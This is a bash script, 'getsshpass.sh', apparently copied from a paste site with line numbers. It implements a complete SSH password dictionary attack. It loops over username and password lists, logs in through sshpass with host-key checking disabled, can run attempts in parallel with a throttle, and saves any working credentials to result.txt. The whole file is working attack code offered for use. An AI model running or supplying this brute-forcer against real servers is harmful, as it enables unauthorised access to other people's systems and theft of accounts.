#!/bin/bashfunction usage { echo -e "Usage: $0 [OPTIONS]" echo "OPTIO

1. #!/bin/bash
2.  
3. function usage {
4. echo -e "Usage: $0 [OPTIONS]"
5. echo "OPTIONS: "
6. echo -e " -a IP address of SSH server"
7. echo -e " -d TCP port 1 - 65535 of SSH server "
8. echo -e " -l parallel dictionary attack"
9. echo -e " -n slow down attack (parallel guessing only)"
10. echo -e " number seconds e.g. 1, 0.1, 0.01, etc."
11. echo -e " -p path to file with passwords"
12. echo -e " -u path to file with usernames"
13. echo -e " -v display version"
14. echo -e " -h display help"
15. }
16.  
17. function version
18. {
19. echo -e "getsshpass.sh 0.1"
20. echo -e "Copyright (C) 2016 Radovan Brezula 'brezular'"
21. echo -e "License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>."
22. echo -e "This is free software: you are free to change and redistribute it."
23. echo -e "There is NO WARRANTY, to the extent permitted by law."
24. exit
25. }
26.  
27.  
28.  
29. function read_args {
30. while getopts "a:d:n:p:u:lhv" arg; do
31. case "$arg" in
32. a) ip="$OPTARG";;
33. d) port="$OPTARG";;
34. n) nval="$OPTARG";;
35. p) passlist="$OPTARG";;
36. u) userlist="$OPTARG";;
37. l) parallel=1;;
38. v) version;;
39. h) usage
40. exit;;
41. esac
42. done
43. }
44.  
45. function check_args {
46. [ -f result.txt ] && echo "File 'result.txt' exists, exiting" && exit
47.  
48. type -P sshpass 1>/dev/null
49. [ "$?" -ne 0 ] && echo "Binary 'sshpass' not found, exiting" && exit
50.  
51. if [ -z "$ip" ]; then
52. echo "IP address can't be empty, exiting"
53. exit
54. else
55. echo "$ip" | grep -w "^[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}.[0-9]\{1,3\}$" 1>/dev/null
56. [ "$?" -ne 0 ] && echo "'$ip' is not valid IP address, exiting" && exit
57. fi
58.  
59. [ -z "$nval" ] && nval=0.01
60.  
61. if [[ "$port" =~ ^[[:digit:]]+$ ]]; then
62. if ( [ "$port" -gt 65535 ] || [ "$port" -eq 0 ] ); then
63. echo "TCP port has to be in range 1 - 65535"
64. exit
65. fi
66. else
67. echo "TCP port must be digit, exiting"
68. exit
69. fi
70.  
71. [ ! -f "$passlist" ] && echo "Can't find file with list of passwords, exiting" && exit
72. [ ! -f "$userlist" ] && echo "Can't find file with list of users, exiting" && exit
73. }
74.  
75. function launch_serial_attack {
76. while read user; do
77. while read pass; do
78. echo "Trying username: '$user' and password: '$pass'"
79. sshpass -p "$pass" ssh -o StrictHostKeyChecking=no -p "$port" "$user"@"$ip" exit &>/dev/null
80. if [ "$?" -eq 0 ]; then
81. echo "*** Attack finished! Found username is: '$user' and password: '$pass' ***" > result.txt
82. cat result.txt
83. exit
84. fi
85. done < "$passlist"
86. done < "$userlist"
87. }
88.  
89. function launch_parallel_attack {
90. sshpass -p "$pass" ssh -o StrictHostKeyChecking=no -p "$port" "$user"@"$ip" exit &>/dev/null
91. if [ "$?" -eq 0 ]; then
92. echo "*** Attack finished! Found username: '$user' and password: '$pass' ***" > result.txt
93. exit
94. fi
95. }
96.  
97. ### BODY ###
98. read_args $@
99. check_args
100.  
101. if [ "$parallel" -eq 1 ]; then
102. while read user; do
103. while read pass; do
104. if [ ! -f result.txt ]; then
105. echo "Trying username: '$user' and password: '$pass'"
106. launch_parallel_attack &>/dev/null &
107. else
108. cat result.txt
109. pkill sshpass &>/dev/null
110. exit
111. fi
112. sleep $nval
113. done < "$passlist"
114. done < "$userlist"
115. else
116. launch_serial_attack
117. fi